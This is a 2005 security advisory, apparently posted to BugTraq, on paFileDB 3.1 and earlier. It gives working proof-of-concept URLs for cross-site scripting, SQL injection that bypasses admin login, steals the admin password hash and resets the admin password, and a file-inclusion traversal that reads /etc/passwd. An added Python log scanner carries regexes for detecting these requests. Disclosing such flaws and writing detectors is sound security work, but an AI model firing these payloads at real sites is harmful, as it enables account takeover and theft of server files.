Multiple paFileDB Vulnerabilities

From: GulfTech Security Research (security_at_gulftech.org)
Date: 06/15/05

    Date: Tue, 14 Jun 2005 22:07:34 -0500
    To: BugTraq <bugtraq@securityfocus.com>, Secunia Research <vuln@secunia.com>, OSVDB <moderators@osvdb.org>

    ##########################################################
    # GulfTech Security Research June 14th, 2005
    ##########################################################
    # Vendor : php Arena
    # URL : http://www.phparena.net/pafiledb.php
    # Version : paFileDB 3.1 && Earlier
    # Risk : Multiple Vulnerabilities
    ##########################################################

    Description:
    paFileDB is a popular open source web application offered by
    php Arena. paFileDB allows webmasters to open up an interactive
    file repository on their website. There are a number of
    vulnerabilities in paFileDB that may allow for an attacker to
    include arbitrary files, retrieve sensitive user and/or database
    information, and completely bypass admin, and team member
    authentication. Users should upgrade immediately.

    Cross Site Scripting:
    There are a number of cross site scripting issues in the paFileDB
    software. The majority of these cross site scripting issues stem from
    concatenated variables never being initialized, so request parameters
    of the same name are appended to the output unescaped.

    http://pafiledb/pafiledb.php?action=viewall&start=20&sortby=name%22
    %3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

    http://pafiledb/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
    script%3Ealert%28document.cookie%29%3C%2Fscript%3E

    http://pafiledb/pafiledb.php?action=category&id=1&pages=%22%3E
    %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

    These vulnerabilities can be used to render hostile code in the
    context of the victim's browser, and in turn disclose sensitive
    information to an attacker.

    SQL Injection:
    There are a number of SQL Injection vulnerabilities in paFileDB,
    but it should be noted that to exploit these issues magic_quotes_gpc
    must be off. Also, magic_quotes_gpc off seems to be the default
    php.ini setting now, so I do consider these issues fairly high
    risk. The most serious of the SQL Injection issues lies in the
    administrative login.

    if ($login == "do")
    {
        // $formname comes straight from the login form and is interpolated
        // into the query string unescaped
        $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin
            WHERE admin_username = '$formname'", 1);
        $formpw = md5($formpass);
        // the stored hash is taken from whatever row the query returned
        if ($formpw == $admin[admin_password])
        {
            $adminip = getenv ("REMOTE_ADDR");
            $ip = md5($adminip);
            $user = $formname;
            $pass = $formpw;

            if ($authmethod == "cookies")
            {
                $cookiedata = "$ip|$formname|$formpw";
                setcookie("pafiledbcookie", $cookiedata);
            }

            header("Location: admin.php");
        }
    }

    The variable $formname is taken directly from the submitted login form
    and used in the query unescaped, so if magic_quotes_gpc is off an
    attacker can use UNION SELECT to bypass admin authentication!

    http://pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION
    %20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
    %20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
    %3E%3E+Log+In+%3C%3C&action=admin&login=do

    The query above uses a UNION SELECT to return the admin username, id,
    email etc., but in place of the stored password hash it supplies the md5
    hash of the $formpass variable, so the password comparison succeeds.
    This same issue applies to the team login, and also to the auth.php
    scripts in the /teams/ and /admin/ directories.

    There is also an SQL Injection vulnerability that will allow for team
    members to gain the administrative password hash and escalate their
    privileges to admin.

    http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
    admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
    Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
    pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

    http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
    admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
    201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
    =%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

    Last but not least there is a SQL Injection vulnerability in search.php
    because the $string variable is never sanitized.

    There is one SQL Injection issue in paFileDB that does not require
    magic_quotes_gpc to be disabled. This particular issue will let a team
    member run any SQL command they like, including making themselves an admin.

    http://pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
    query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
    20WHERE%201/*

    The above URL would successfully set the admin password to 1337 if run by
    a logged in team member or admin. This vulnerability exists because the
    $query variable is never initialized before being concatenated, so a
    request parameter of the same name hijacks $query and runs any SQL
    commands the attacker likes.

    Local File Include Vulnerability:
    paFileDB is vulnerable to a local file inclusion vulnerability that may
    allow for an attacker to execute arbitrary local scripts, or read/access
    arbitrary files on the webserver. Let's look at pafiledb.php:

    if ($login == "do") { include "./includes/$action/login.php"; exit; }
    if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
    if ($tm == "logout") { include "./includes/team/logout.php"; exit; }

    The $action variable is never sanitized and is vulnerable to directory
    traversal sequences.

    http://pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do

    This vulnerability exists on all paFileDB configurations, as all GPC
    is extracted to global variables.
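    A defender's counterpart to the issues above: the following is an added
    example, not part of the advisory or of paFileDB, that scans constructed
    web-server access-log lines for the request shapes described in the
    Cross Site Scripting, SQL Injection, $query hijack and Local File Include
    sections. The pafiledb.php path and the parameter names come from the
    advisory; the log lines, the client address and the regular expressions
    are assumptions of the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not captured traffic); the request
# strings follow the payload shapes the advisory describes for pafiledb.php.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2005:22:07:34 -0500] "GET /pafiledb/pafiledb.php?action=viewall&start=20&sortby=name HTTP/1.1" 200 5120
203.0.113.5 - - [14/Jun/2005:22:08:01 -0500] "GET /pafiledb/pafiledb.php?action=admin&login=do&formname=-99'%20UNION%20SELECT%20admin_id,admin_username,'6f1ed002ab5595859014ebf0951522d9',admin_email,1%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah HTTP/1.1" 302 0
203.0.113.5 - - [14/Jun/2005:22:08:15 -0500] "GET /pafiledb/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%3D%27x%27%20WHERE%201/* HTTP/1.1" 200 311
203.0.113.5 - - [14/Jun/2005:22:08:40 -0500] "GET /pafiledb/pafiledb.php?action=../../../../etc/passwd%00&login=do HTTP/1.1" 200 1893
"""

REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
SQLI_RE = re.compile(r"(?i)\bunion\b\s+(?:all\s+)?select\b|'\s*(?:or|and)\b|/\*")
XSS_RE = re.compile(r"(?i)<\s*script|javascript:|on\w+\s*=")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|\x00")   # ../ or ..\ or a null byte

def classify_request(target):
    """Return finding labels for one request target; [] if nothing matched."""
    parts = urlsplit(target)
    if not parts.path.endswith("pafiledb.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # also catch a second layer of percent-encoding
            if SQLI_RE.search(value):
                findings.append(f"sqli:{name}")
            # the advisory names sortby, filelist and pages as reflected unescaped
            if name in ("sortby", "filelist", "pages") and XSS_RE.search(value):
                findings.append(f"xss:{name}")
            if name == "action" and TRAVERSAL_RE.search(value):
                findings.append(f"lfi:{name}")
    # $query is never set by the script before use, so a client-supplied
    # "query" parameter on the file edit step is a hijack attempt whatever it holds.
    if "query" in params and params.get("edit") == ["do"]:
        findings.append("query-hijack")
    return findings

def scan_log(text):
    """Map 1-based log line numbers to their findings; clean lines are omitted."""
    flagged = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if m and (hits := classify_request(m.group(1))):
            flagged[lineno] = hits
    return flagged
```

    Calling scan_log(SAMPLE_LOG) leaves the benign first line unreported and
    labels the other three as sqli, sqli plus query-hijack, and lfi.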

    Solution:
    A new version of paFileDB has been released, so upgrading is advised.

    Related Info:
    The original advisory can be found at the following location
    http://www.gulftech.org/?node=research&article_id=00082-06142005

    Credits:
    James Bercegay of the GulfTech Security Research Team
